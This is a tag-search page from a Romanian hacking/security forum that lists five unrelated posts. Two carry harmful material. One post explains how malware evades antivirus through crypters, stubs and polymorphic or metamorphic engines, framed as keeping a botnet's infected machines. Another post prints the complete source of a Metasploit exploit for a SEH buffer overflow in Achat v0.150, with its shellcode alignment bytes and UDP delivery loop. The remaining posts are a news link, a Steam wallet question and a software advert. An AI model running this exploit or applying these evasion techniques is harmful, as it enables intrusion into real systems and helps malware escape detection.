Jump to content

Search the Community

Showing results for tags 'add'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 5 results

  1. https://www.mobilissimo.ro/stiri-diverse/un-bug-ciudat-afecteaza-facebook-cereri-de-prietenie-sunt-trimise-automat
  2. Inainte sa cumpar un cod de paysafe-card am lasat in steam deschisa optiunea aceea "Add funds to your Steam Wallet". Iar acum cand vreau sa continui metoda de a adauga prin paysafe imi apare :
  3. Before we start it's probably best to explain some things: Signature - A pattern of bytes used by an antivirus to identify malicious executables, this could be a string, parts of a function, or a hash. Crypting - This is the most common way of evading antivirus detections, it works by encrypting the malicious executable so the antivirus cannot match the malicious code to existing signatures. Payload - The malicious executable which is encrypted to evade detections, this is attached to the stub in some way (stored as a resource, added after then end of file, appended to a new or existing section). Stub - A simple program responsible for decrypting the payload and executing it in memory. Due to the payload being encrypted, antiviruses will attempt to generate signatures to match the stub's code, but because the stub is small and simple it can be easily modified to evade existing signatures. Polymorphism Polymorphism is a solution to a problem mainly found with worms/botnet: When an AV adds a new signature that detects the malicious executable, the infected file will be quarantined, leaving the malware running in memory until reboot. If a botmaster is running a botnet with thousands of bots, each time the stub is detected he's likely to lose a few hundred bots, his only choice: To keep updating the bots with a new stub before the previous one is detected (which for large botnets can be every few hours), leaving the hacker with very little free time. A solution to this would be to write malware capable of programmatically generating a unique stub and replacing the old one on execution, resulting in each computer having a different stub; this is know as polymorphism. there's a few ways to programmatically create unique code that performs the same function as the previous. Block Mutation A lot of assembly instructions can be freely movable, whilst some cannot. An instruction using a relative address (such as a jump or call), when moved will point to a different location, breaking the code; freely movable instructions such as those using absolute addresses or only registers can be moved anywhere. Block based polymoprphism works by breaking the code down into small blocks, which are then numbered; the number specifies the order in which they execute and the block is either marked as movable or immovable based on its containing instruction. The mutation engine can then reorder, relocate, or separate the movable block; using jumps or similar instructions to link them together so that they execute in the correct order. Junk code (random instructions which are never actually executed) can also be added between blocks to add more entropy and change the executable size. Register Swapping It's possible to write the code in such a way that registers can easily be switched out, for instance all occurrences of edx within a function could be replaced with ecx, changing a lot of bytes within the application. The only problem with this approach is there's only a few usable registers, making it easy to exhaust all possible combinations, and it's still possible to generate signatures based on the layout of the instructions. Internal Assembler + Intermediate Language A very effective approach is to embed an assembler within the payload, as well as create an intermediate language (IL) which the polymorphic engine uses to create ASM on the fly. A simple example would be the following IL code. pmov Reg1, 5 add eax, Reg1 In this example instructions prefixed with p will be mutated at an instruction level, whilst those without a prefix will just be assigned a register and compiled as ASM. The IL engine would then use a seed to randomly generate the p-prefixed instructions by picking an instruction, or group of instructions, to perform the operation, as well as assign a register to Reg1 and Reg2. The array of instructions to handle pmov would look something like this: push val pop reg mov reg, val xor reg, reg add reg, val Once the engine has picked which instruction it wishes to use, it would then fill in the register and value, then compile it to ASM. Here are some examples of final outputs. push 5 pop edx add eax, edx mov ecx, 5 add eax, ecx xor ebx, ebx add ebx, 5 add eax, ebx By using an IL, we avoid having to first disassemble the stub code before mutating it. Metamorphism Today advanced metamorphic malware which can efficiently evade signature detection is nearly impossible, but back in the days of DOS / 95 / 98 viruses, it has been achieved multiple times. The idea of metamorphism is to take polymorphism a step further and instead of encrypting the malicious executable and mutating the stub, the entire malicious executable is mutated, including the code required to perform the mutation. Malware that is required to create a new, unique copy of itself on every propagation is also required to disassemble previously mutated code and regulate size (because instructions can be mutated into multiple instructions, it's important to be able to do the opposite or the executable grows almost exponentially with every mutation). Due to the amount of consideration and effort that would have to go into creating modern metamorphic malware, most programmers opt to use polymorphism instead, as this allows them to generate output from a temporary representation. A simple mistake during disassembling could result in the executable ceasing to work, and it's a lot harder to debug and test metamorphism in large applications. Source
  4. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Achat v0.150 beta7 Buffer Overflow', 'Description' => %q{ This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By sending a crafted message to the default port 9256 it's possible to overwrites the SEH handler. Even when the exploit is reliable it depends of timing since there are two threads overflowing the stack in the same time. This module has been tested on Windows XP SP3 and Windows 7. }, 'Author' => [ 'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery 'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CWE', '121'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'DisableNops' => true, 'Space' => 730, 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), 'StackAdjustment' => -3500, 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX' } }, 'Platform' => 'win', 'Targets' => [ # Tested OK Windows XP SP3, Windows 7 # Not working on Windows Server 2003 [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe ], 'Privileged' => false, 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 18 2014')) register_options( [ Opt::RPORT(9256) ], self.class) end def exploit connect_udp # 0055 00 ADD BYTE PTR SS:[EBP],DL # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # padding # 55 PUSH EBP # ebp holds a close pointer to the payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # mov eax, ebp # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 05 00140011 ADD EAX,11001400 # adjusting eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 50 PUSH EAX # eax points to the start of the shellcode # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # padding # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 59 POP ECX # padding # 0039 ADD BYTE PTR DS:[ECX],BH # padding first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00" sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46) sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset sploit << "\x61\x40" # POPAD + INC EAX sploit << target.ret # AChat.exe p/p/r address # adjusting the first thread's unicode payload, tricky asm-fu # the first seh exception jumps here, first_stage variable will be executed # by the second seh exception as well. It needs to be in sync with the second # thread, so that is why we adjust eax/ebp to have a close pointer to the # payload, then first_stage variable will take the rest of the job. # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 55 PUSH EBP # ebp with close pointer to payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # put ebp to eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place # 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more # 05 00140011 ADD EAX,11001400 # more adjusting # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 50 PUSH EAX # saving eax # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 5D POP EBP # mov ebp, eax sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload sploit << "\x00" + 'A' * 10 + "\x00" i = 0 while i < sploit.length do if i > 172000 Rex::sleep(1.0) end sent = udp_sock.put(sploit[i..i + 8192 - 1]) i += sent end disconnect_udp end end Source
  5. Product Description Professional Video Watermark Software – Easy-to-use and Powerful Add Watermark to Video Files Whatever AVI, MP4, FLV, MOV, MPG, SWF or any other Video Formats! Add Text/Image/Shape Watermark to Videos Create Dynamic Watermark and Subtitle Effects Provide 200+ Free Watermark Materials Add Specific Effects to Video Support a wide range of video formats: AVI, MP4, FLV, MOV, MPG, etc. Protect Your Online Video Worry your shared videos might be used without your permission? Want to let viewers know the original author when people watching your shared videos? With Aoao Video Watermark Pro, you can add your copyright information to your videos to avoid the unauthorized use and ensure the ownership. Aoao Video Watermark Pro enables user to embed text, image, logo, sign (includes animated sign to your videos in batches. With friendly and easy-to-follow interface, user can feel extremely convenient to operate it. Up to 10X faster conversion speed makes you avoid waiting for a long time. Just with a few of clicks, you can watermark a batch of videos. All in all, Aoao Video Watermark Pro provides the excellent solution to protect your original work. Add Text Watermark to Video Provide rich settings (like opacity, rotation, font options, etc). Add copyright symbols C, R and TM to video. Support dynamic text watermark. Add Image Watermark to Video The image watermark can be logo, icon or any image files. Over 200 samples provided for free. Support adding animated GIF image as watermark. Add Shape Watermark to Video Create a line segment, curve, rectangle and oval shape to video, as well as an arrow. Common settings – color, width, opacity, rotation, etc Powerful Video Conversion Software Aoao Video Watermark Pro well supports all popular video formats on the Internet, including AVI, MPEG, WMV, MP4, MKV, 3GP, RM, FLV, SWF, etc. It also enables user to convert file to any format mentioned above. -> Download <- EXPIRED!
×
×
  • Create New...